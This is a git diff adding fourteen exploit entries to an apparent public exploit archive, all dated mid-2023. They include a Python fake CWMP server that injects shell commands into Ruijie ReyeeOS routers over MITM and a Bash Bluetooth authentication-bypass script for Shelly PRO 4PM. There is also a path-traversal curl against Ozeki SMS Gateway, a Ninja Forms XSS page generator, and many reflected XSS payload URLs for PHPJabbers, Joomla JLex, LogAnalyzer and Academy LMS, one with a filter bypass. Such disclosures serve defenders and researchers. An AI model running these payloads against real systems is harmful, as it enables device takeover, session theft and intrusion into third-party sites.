diff --git a/exploits/hardware/remote/51642.py b/exploits/hardware/remote/51642.py
new file mode 100755
index 000000000..0668cacb0
--- /dev/null
+++ b/exploits/hardware/remote/51642.py
@@ -0,0 +1,176 @@
+# Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)
+# Google Dork: None
+# Date: July 31, 2023
+# Exploit Author: Riyan Firmansyah of Seclab
+# Vendor Homepage: https://ruijienetworks.com
+# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204
+# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400)
+# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
+# CVE : None
+
+"""
+Summary
+=======
+The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection.
+In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request.
+Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server.
+Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system.
+"""
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+from html import escape, unescape
+import http.server
+import socketserver
+import io
+import time
+import re
+import argparse
+import gzip
+
+# command payload
+command = "uname -a"
+
+# change this to serve on a different port
+PORT = 8080
+
+def cwmp_inform(soap):
+    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
+    product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1)
+    serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1)
+    result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}}
+    parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap)
+    for parameter in parameters:
+        parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1)
+        parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1)
+        result['parameters'][parameter_name] = parameter_value
+    return result
+
+def cwmp_inform_response():
+    return """<?xml version='1.0' encoding='UTF-8'?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
+
+def command_payload(command):
+    current_time = time.time()
+    result = """<?xml version='1.0' encoding='UTF-8'?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command)
+    return result
+
+def command_response(soap):
+    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
+    command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1)
+    response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1)
+    result = {'cwmp_id': cwmp_id, 'command': command, 'response': response}
+    return result
+
+class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
+    protocol_version = 'HTTP/1.1'
+    def do_GET(self):
+        self.send_response(204)
+        self.end_headers()
+
+    def do_POST(self):
+        print("[*] Got hit by", self.client_address)
+
+        f = io.BytesIO()
+        if 'service' in self.path:
+            stage, info = self.parse_stage()
+            if stage == "cwmp_inform":
+                self.send_response(200)
+                print("[!] Got Device information", self.client_address)
+                print("[*] Product Class:", info['product_class'])
+                print("[*] Serial Number:", info['serial_number'])
+                print("[*] MAC Address:", info['parameters']['mac'])
+                print("[*] STUN Client IP:", info['parameters']['stunclientip'])
+                payload = bytes(cwmp_inform_response(), 'utf-8')
+                f.write(payload)
+                self.send_header("Content-Length", str(f.tell()))
+            elif stage == "command_request":
+                self.send_response(200)
+                self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly")
+                print("[*] Device interacting", self.client_address)
+                print(info)
+                payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8')
+                f.write(payload)
+                self.send_header("Content-Length", str(f.tell()))
+            else:
+                print("[*] Command response", self.client_address)
+                print(unescape(info['response']))
+                self.send_response(204)
+                f.write(b"")
+        else:
+            print("[x] Received invalid request", self.client_address)
+            self.send_response(204)
+            f.write(b"")
+
+        f.seek(0)
+        self.send_header("Connection", "keep-alive")
+        self.send_header("Content-type", "text/xml;charset=utf-8")
+        self.end_headers()
+        if f:
+            self.copyfile(f, self.wfile)
+            f.close()
+
+    def parse_stage(self):
+        content_length = int(self.headers['Content-Length'])
+        post_data = gzip.decompress(self.rfile.read(content_length))
+        if "cwmp:Inform" in post_data.decode("utf-8"):
+            return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8")))
+        elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"):
+            return ("command_response", command_response(post_data.decode("utf-8")))
+        else:
+            return ("command_request", "Ping!")
+
+    def log_message(self, format, *args):
+        return
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--bind', '-b', default='', metavar='ADDRESS',
+                        help='Specify alternate bind address '
+                             '[default: all interfaces]')
+    parser.add_argument('port', action='store',
+                        default=PORT, type=int,
+                        nargs='?',
+                        help='Specify alternate port [default: {}]'.format(PORT))
+    args = parser.parse_args()
+
+    Handler = CustomHTTPRequestHandler
+    with socketserver.TCPServer((args.bind, args.port), Handler) as httpd:
+        ip_addr = args.bind if args.bind != '' else '0.0.0.0'
+        print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port))
+        try:
+            httpd.serve_forever()
+        except KeyboardInterrupt:
+            pass
+        httpd.server_close()
+
+
+"""
+Output
+======
+ubuntu:~$ python3 exploit.py
+[!] serving fake CWMP server at 0.0.0.0:8080
+[*] Got hit by ('[redacted]', [redacted])
+[!] Got Device information ('[redacted]', [redacted])
+[*] Product Class: EW1200G-PRO
+[*] Serial Number: [redacted]
+[*] MAC Address: [redacted]
+[*] STUN Client IP: [redacted]:[redacted]
+[*] Got hit by ('[redacted]', [redacted])
+[*] Device interacting ('[redacted]', [redacted])
+Ping!
+[*] Got hit by ('[redacted]', [redacted])
+[*] Command response ('[redacted]', [redacted])
+PING 127.0.0.1 (127.0.0.1): 56 data bytes
+64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms
+64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms
+64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms
+64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms
+
+--- 127.0.0.1 ping statistics ---
+4 packets transmitted, 4 packets received, 0% packet loss
+round-trip min/avg/max = 0.300/0.335/0.400 ms
+Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux
+
+"""
\ No newline at end of file
diff --git a/exploits/hardware/remote/51657.txt b/exploits/hardware/remote/51657.txt
new file mode 100644
index 000000000..e5c64fa35
--- /dev/null
+++ b/exploits/hardware/remote/51657.txt
@@ -0,0 +1,68 @@
+#!/bin/bash
+
+# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
+# Google Dork: NA
+# Date: 2nd August 2023
+# Exploit Author: The Security Team [exploitsecurity.io]
+# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
+# Vendor Homepage: https://www.shelly.com/
+# Software Link: NA
+# Version: Firmware v0.11.0 (REQUIRED)
+# Tested on: MacOS/Linux
+# CVE : CVE-2023-33383
+
+IFS=
+failed=$false
+RED="\e[31m"
+GREEN="\e[92m"
+WHITE="\e[97m"
+ENDCOLOR="\e[0m"
+substring="Connection refused"
+
+
+banner()
+    {
+        clear
+        echo -e "${GREEN}[+]*********************************************************[+]"
+        echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
+        echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
+        echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
+        echo -e "${GREEN}[+]*********************************************************[+]"
+        echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
+    }
+
+banner
+read -s -n 1 key
+if [ "$key" = "x" ]; then
+    exit 0;
+elif [ "$key" = "" ]; then
+    gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
+    if [ -z "$gattout" ]; then
+        echo -e "${RED}Connection timed out${ENDCOLOR}"
+        exit 0;
+    else
+    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
+    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
+    sleep 1
+    if [ $? -eq 1 ]; then
+       $failed=$true
+       exit 0;
+    fi
+    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
+    sleep 1
+    if [ $? -eq 1 ]; then
+        $failed=$true
+        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
+        exit 0;
+    else
+       sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
+       sleep 1
+       for i in {1..5}
+       do
+          echo -ne "${GREEN}."
+          sleep 1
+       done
+       echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
+    fi
+fi
+fi
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51646.txt b/exploits/multiple/webapps/51646.txt
new file mode 100644
index 000000000..aeff179a5
--- /dev/null
+++ b/exploits/multiple/webapps/51646.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
+# Date: 01.08.2023
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://ozeki-sms-gateway.com
+# Software Link:
+https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
+# Version: 10.3.208
+# Tested on: Windows 10
+
+
+
+##################################### Arbitrary File Read PoC
+#####################################
+
+curl
+https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
+
+##################################### Arbitrary File Read PoC
+#####################################
\ No newline at end of file
diff --git a/exploits/php/webapps/51643.txt b/exploits/php/webapps/51643.txt
new file mode 100644
index 000000000..f509b8917
--- /dev/null
+++ b/exploits/php/webapps/51643.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
+# Date: 2023.Aug.01
+# Exploit Author: Pedro (ISSDU TW)
+# Vendor Homepage: https://loganalyzer.adiscon.com/
+# Software Link: https://loganalyzer.adiscon.com/download/
+# Version: v4.1.13 and before
+# Tested on: Linux
+# CVE : CVE-2023-36306
+
+There are several installation method.
+If you installed without database(File-Based),No need to login.
+If you installed with database, You should login with Read Only User(at least)
+
+XSS Payloads are as below:
+
+XSS
+http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
+http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
+http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
+http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
+http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
+http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
+http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
+http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
\ No newline at end of file
diff --git a/exploits/php/webapps/51644.py b/exploits/php/webapps/51644.py
new file mode 100755
index 000000000..f4fdda487
--- /dev/null
+++ b/exploits/php/webapps/51644.py
@@ -0,0 +1,158 @@
+# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
+# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
+# Date: 2023-07-27
+# Exploit Author: Mehran Seifalinia
+# Vendor Homepage: https://ninjaforms.com/
+# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
+# Version: 3.6.25
+# Tested on: Windows 10
+# CVE: CVE-2023-37979
+
+from requests import get
+from sys import argv
+from os import getcwd
+import webbrowser
+from time import sleep
+
+
+# Values:
+url = argv[-1]
+if url[-1] == "/":
+    url = url.rstrip("/")
+
+# Constants
+CVE_NAME = "CVE-2023-37979"
+VULNERABLE_VERSION = "3.6.25"
+
+  # HTML template
+HTML_TEMPLATE = f"""<!DOCTYPE html>
+<!-- Created By Mehran Seifalinia -->
+<html>
+<head>
+  <title>{CVE_NAME}</title>
+  <style>
+    body {{
+      font-family: Arial, sans-serif;
+      background-color: #f7f7f7;
+      color: #333;
+      margin: 0;
+      padding: 0;
+    }}
+    header {{
+      background-color: #4CAF50;
+      padding: 10px;
+      text-align: center;
+      color: white;
+      font-size: 24px;
+    }}
+    .cool-button {{
+      background-color: #007bff;
+      color: white;
+      padding: 10px 20px;
+      border: none;
+      cursor: pointer;
+      font-size: 16px;
+      border-radius: 4px;
+    }}
+    .cool-button:hover {{
+      background-color: #0056b3;
+    }}
+  </style>
+</head>
+<body>
+  <header>
+	Ninja-forms reflected XSS ({CVE_NAME})</br>
+    Created by Mehran Seifalinia
+  </header>
+  <div style="padding: 20px;">
+    <form action="{url}/wp-admin/admin-ajax.php" method="POST">
+      <input type="hidden" name="action" value="nf&#95;batch&#95;process" />
+      <input type="hidden" name="batch&#95;type" value="import&#95;form&#95;template" />
+      <input type="hidden" name="security" value="e29f2d8dca" />
+      <input type="hidden" name="extraData&#91;template&#93;" value="formtemplate&#45;contactformd" />
+      <input type="hidden" name="method&#95;override" value="&#95;respond" />
+      <input type="hidden" name="data" value="Mehran"&#125;&#125;<img&#32;src&#61;Seifalinia&#32;onerror&#61;alert&#40;String&#46;fromCharCode&#40;78&#44;105&#44;110&#44;106&#44;97&#44;45&#44;102&#44;111&#44;114&#44;109&#44;115&#44;32&#44;114&#44;101&#44;102&#44;108&#44;101&#44;99&#44;116&#44;101&#44;100&#44;32&#44;88&#44;83&#44;83&#44;10&#44;67&#44;86&#44;69&#44;45&#44;50&#44;48&#44;50&#44;51&#44;45&#44;51&#44;55&#44;57&#44;55&#44;57&#44;10&#44;45&#44;77&#44;101&#44;104&#44;114&#44;97&#44;110&#44;32&#44;83&#44;101&#44;105&#44;102&#44;97&#44;108&#44;105&#44;110&#44;105&#44;97&#44;45&#41;&#41;>" />
+      <input type="submit" class="cool-button" value="Click here to Execute XSS" />
+    </form>
+  </div>
+  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
+  <footer>
+	<a href="https://github.com/Mehran-Seifalinia">Github</a>
+	</br>
+	<a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a
+  </footer>
+</body>
+</html>
+"""
+
+def exploit():
+    with open(f"{CVE_NAME}.html", "w") as poc:
+        poc.write(HTML_TEMPLATE)
+        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")
+        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
+        sleep(2)
+        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")
+
+# Check if the vulnerable version is installed
+def check_CVE():
+    try:
+        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
+        if response.status_code != 200 or not("Ninja Forms" in response.text):
+            print("[!] Ninja-forms plugin has not installed on this site.")
+            return False
+        else:
+            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
+            main_version = int(version.split(".")[0])
+            partial_version = int(version.split(".")[1])
+            final_version = int(version.split(".")[2])
+            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):
+                print(f"[*] Vulnerable Nonja-forms version {version} detected!")
+                return True
+            else:
+                print(f"[!] Nonja-forms version {version} is not vulnerable!")
+                return False
+    except Exception as error:
+        print(f"[!] Error: {error}")
+        exit()
+
+# Check syntax of the script
+def check_script():
+    usage = f"""
+Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]
+
+    OPTIONS:
+        --exploit:  Open a browser and execute the vulnerability.
+    TARGET:
+        An URL starts with 'http://' or 'https://'
+
+Examples:
+    > {argv[0].split("/")[-1]} https://vulnsite.com
+    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com
+"""
+    try:
+        if len(argv) < 2 or len(argv) > 3:
+            print("[!] Syntax error...")
+            print(usage)
+            exit()
+        elif not url.startswith(tuple(["http://", "https://"])):
+            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")
+            exit()
+        else:
+            for arg in argv:
+                if arg == argv[0]:
+                    print("[*]Starting the script >>>")
+                    state = check_CVE()
+                    if state == False:
+                        exit()
+                elif arg.lower() == "--exploit":
+                    exploit()
+                elif arg == url:
+                    continue
+                else:
+                    print(f"[!] What the heck is '{arg}' in the command?")
+    except Exception as error:
+        print(f"[!] Error: {error}")
+        exit()
+
+if __name__ == "__main__":
+    check_script()
\ No newline at end of file
diff --git a/exploits/php/webapps/51645.txt b/exploits/php/webapps/51645.txt
new file mode 100644
index 000000000..f0ba08ae0
--- /dev/null
+++ b/exploits/php/webapps/51645.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 01/08/2023
+# Vendor: JLexArt
+# Vendor Homepage: https://jlexart.com/
+# Software Link: https://extensions.joomla.org/extension/jlex-review/
+# Demo: https://jlexreview.jlexart.com/
+# Version: 6.0.1
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /
+
+URL parameter is vulnerable to XSS
+
+https://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1
+
+
+
+XSS Payloads:
+
+itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn
\ No newline at end of file
diff --git a/exploits/php/webapps/51647.txt b/exploits/php/webapps/51647.txt
new file mode 100644
index 000000000..db7e08ff0
--- /dev/null
+++ b/exploits/php/webapps/51647.txt
@@ -0,0 +1,34 @@
+# Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 01/08/2023
+# Vendor: JLexArt
+# Vendor Homepage: https://jlexart.com/
+# Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/
+# Demo: https://jlexguestbook.jlexart.com/
+# Version: 1.6.4
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /u/perry-705
+
+GET parameter 'q' is vulnerable to XSS
+
+http://website/u/perry-705?q=[XSS]&wl=1
+
+
+XSS Payloads:
+
+db8ck"onfocus="confirm(1)"autofocus="xwu0k
\ No newline at end of file
diff --git a/exploits/php/webapps/51648.txt b/exploits/php/webapps/51648.txt
new file mode 100644
index 000000000..311641dca
--- /dev/null
+++ b/exploits/php/webapps/51648.txt
@@ -0,0 +1,24 @@
+# Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 20/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/shuttle-booking-software/
+# Version: 1.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4112
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+URL parameter is vulnerable to RXSS
+
+https://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51649.txt b/exploits/php/webapps/51649.txt
new file mode 100644
index 000000000..0c1b68128
--- /dev/null
+++ b/exploits/php/webapps/51649.txt
@@ -0,0 +1,30 @@
+# Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 21/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/service-booking-script/
+# Version: 1.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4113
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS]
\ No newline at end of file
diff --git a/exploits/php/webapps/51650.txt b/exploits/php/webapps/51650.txt
new file mode 100644
index 000000000..52a1d2c5a
--- /dev/null
+++ b/exploits/php/webapps/51650.txt
@@ -0,0 +1,30 @@
+# Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 21/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/night-club-booking-software/
+# Version: 1.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4114
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
\ No newline at end of file
diff --git a/exploits/php/webapps/51651.txt b/exploits/php/webapps/51651.txt
new file mode 100644
index 000000000..93fb46854
--- /dev/null
+++ b/exploits/php/webapps/51651.txt
@@ -0,0 +1,32 @@
+# Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 21/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/cleaning-business-software/
+# Version: 1.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4115
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS]
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51652.txt b/exploits/php/webapps/51652.txt
new file mode 100644
index 000000000..36efe5adc
--- /dev/null
+++ b/exploits/php/webapps/51652.txt
@@ -0,0 +1,33 @@
+# Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 22/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/taxi-booking-script/
+# Version: 2.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4116
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS]
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51653.txt b/exploits/php/webapps/51653.txt
new file mode 100644
index 000000000..d5bd908f3
--- /dev/null
+++ b/exploits/php/webapps/51653.txt
@@ -0,0 +1,33 @@
+# Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 22/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/
+# Version: 2.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4117
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'index' is vulnerable to RXSS
+
+https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51654.txt b/exploits/php/webapps/51654.txt
new file mode 100644
index 000000000..8f8502413
--- /dev/null
+++ b/exploits/php/webapps/51654.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Academy LMS 6.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 22/07/2023
+# Vendor: Creativeitem
+# Vendor Homepage: https://creativeitem.com/
+# Software Link: https://demo.creativeitem.com/academy/
+# Version: 6.0
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4119
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /academy/home/courses
+
+GET parameter 'query' is vulnerable to XSS
+
+https://website/academy/home/courses?query=[XSS]
+
+
+Path: /academy/home/courses
+
+GET parameter 'sort_by' is vulnerable to XSS
+
+https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]
+
+
+XSS Payloads (Blocked) :
+
+<script>alert(1)</script>
+ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd
+
+
+XSS Payload Bypass Filter :
+
+cplvz"><img src=a onerror=alert(1)>fk4ap
+
